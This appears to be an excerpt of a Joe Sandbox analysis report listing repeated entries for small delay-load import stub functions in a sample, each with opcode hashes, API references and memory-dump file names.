Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 647b2398f96d156e938122206633706247c1d09798f3d6996debde4ee0b93b7d
Instruction ID: fb91f047885b1ec467d46529b4ae639b89dd942de6d3d34e3e3f675387df49eb
Opcode Fuzzy Hash: 647b2398f96d156e938122206633706247c1d09798f3d6996debde4ee0b93b7d
Instruction Fuzzy Hash: 84B012952BC305BC310C6358FC02D36037CF1C0B10330471BB209D1341EA806C084032

Function 008DDC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDC36

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4aeefd234bae43fd68255ca06d84189264e82c0f6176daab942fad852ba0a50c
Instruction ID: f71ade8d82f19fa8ca4106e5a83d57d0c173ad39c30e52d933ba524dd1fbcb14
Opcode Fuzzy Hash: 4aeefd234bae43fd68255ca06d84189264e82c0f6176daab942fad852ba0a50c
Instruction Fuzzy Hash: 0EB012952BC305BC310C6358FC02D36037CE1C4B10330871BB609D1341EA806C084032

Function 008DD8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b19fceb961e8bff9e444d73ea430a75dd443ce1ed35e30d53c5844a10cb8b381
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: b19fceb961e8bff9e444d73ea430a75dd443ce1ed35e30d53c5844a10cb8b381
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f2d0b7e995fb1de62c1832f76532729dcd7efb675248f617672d88a69272fa67
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: f2d0b7e995fb1de62c1832f76532729dcd7efb675248f617672d88a69272fa67
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f9f65be09993e377e06e99ee8689ebf411f9913e0bd3b356bd0a00a0d2d878e4
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: f9f65be09993e377e06e99ee8689ebf411f9913e0bd3b356bd0a00a0d2d878e4
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ee4c00796781a0bd3d3a81aea2e571e84e996151913b65b854da93edab01570e
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: ee4c00796781a0bd3d3a81aea2e571e84e996151913b65b854da93edab01570e
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 761bf569323ea4f623ac3df3faf3f671010386183c64957d79cf1f82fba7ba3a
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: 761bf569323ea4f623ac3df3faf3f671010386183c64957d79cf1f82fba7ba3a
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7b9be8e4448989567e05b0714584268edc2cba255e27ec17ef071caba61fe3da
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: 7b9be8e4448989567e05b0714584268edc2cba255e27ec17ef071caba61fe3da
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b73e1bb49a3364ee38810276b23b3d2215c75e003826c951c92b9256a0092e3e
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: b73e1bb49a3364ee38810276b23b3d2215c75e003826c951c92b9256a0092e3e
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f7739be0084d05e93fdb364570f5275ed71eb3cb59f07d7e8609b7c93e470029
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: f7739be0084d05e93fdb364570f5275ed71eb3cb59f07d7e8609b7c93e470029
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 96089224bf26b7a30dbea73e2ad786ea39ac2fa1428709c57c5ccd970e524f0a
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: 96089224bf26b7a30dbea73e2ad786ea39ac2fa1428709c57c5ccd970e524f0a
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0e2606607862814c4ff2278016ed23abecebd977286f0e67e9cf000d982f56db
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: 0e2606607862814c4ff2278016ed23abecebd977286f0e67e9cf000d982f56db
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DD979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DD8A3

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 098faa0292b2aedc2e30cb84c1b4d26c2b969f4f519810f4da838c99f287b00f
Instruction ID: 39cd4f56329d1a9eba700dd978c70a2346150228da98c5f50985127ce04ad0d7
Opcode Fuzzy Hash: 098faa0292b2aedc2e30cb84c1b4d26c2b969f4f519810f4da838c99f287b00f
Instruction Fuzzy Hash: BFA002D556D6067C31097255ED56D36031CE4C5B553304A1BB556D52C199446C455432

Function 008DDAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9c3bd273ded47ec3f155e365938cb03cdc4a10fe458743771732d5f90057d6e1
Instruction ID: 1b69f897ae746f4b21ceb01f1d345a7efd465be095bc23faaab69d5a06d35948
Opcode Fuzzy Hash: 9c3bd273ded47ec3f155e365938cb03cdc4a10fe458743771732d5f90057d6e1
Instruction Fuzzy Hash: C7A001A62AD61A7C3158B266ED16D3A036CF4D0B66330971BB51AE4289A98858495832

Function 008DDACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c33e88352b1a770d7edcf6786721cf8ed8ff3fefd332c4ba92134b401e94c44a
Instruction ID: 54e2624de136a7382c13ffb908f918ecf7cc875a82b758b337662e4c1a19b595
Opcode Fuzzy Hash: c33e88352b1a770d7edcf6786721cf8ed8ff3fefd332c4ba92134b401e94c44a
Instruction Fuzzy Hash: 96A001A62AD21BBC31187266ED16D3A036CE4C4BA53309B1BB51AD4289A98858495832

Function 008DDAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: da2692f445192e8079a5eb53abc948e877fb19906d4aa59ddc0dbdad8daad4b9
Instruction ID: 54e2624de136a7382c13ffb908f918ecf7cc875a82b758b337662e4c1a19b595
Opcode Fuzzy Hash: da2692f445192e8079a5eb53abc948e877fb19906d4aa59ddc0dbdad8daad4b9
Instruction Fuzzy Hash: 96A001A62AD21BBC31187266ED16D3A036CE4C4BA53309B1BB51AD4289A98858495832

Function 008DDAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9c88ff279580f11a4295b8a50e59e11573f7ba4bc807e86037eead9675de9ab0
Instruction ID: 54e2624de136a7382c13ffb908f918ecf7cc875a82b758b337662e4c1a19b595
Opcode Fuzzy Hash: 9c88ff279580f11a4295b8a50e59e11573f7ba4bc807e86037eead9675de9ab0
Instruction Fuzzy Hash: 96A001A62AD21BBC31187266ED16D3A036CE4C4BA53309B1BB51AD4289A98858495832

Function 008DDAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DDAB2

Part of subcall function 008DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008DDFD6
Part of subcall function 008DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008DDFE7

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
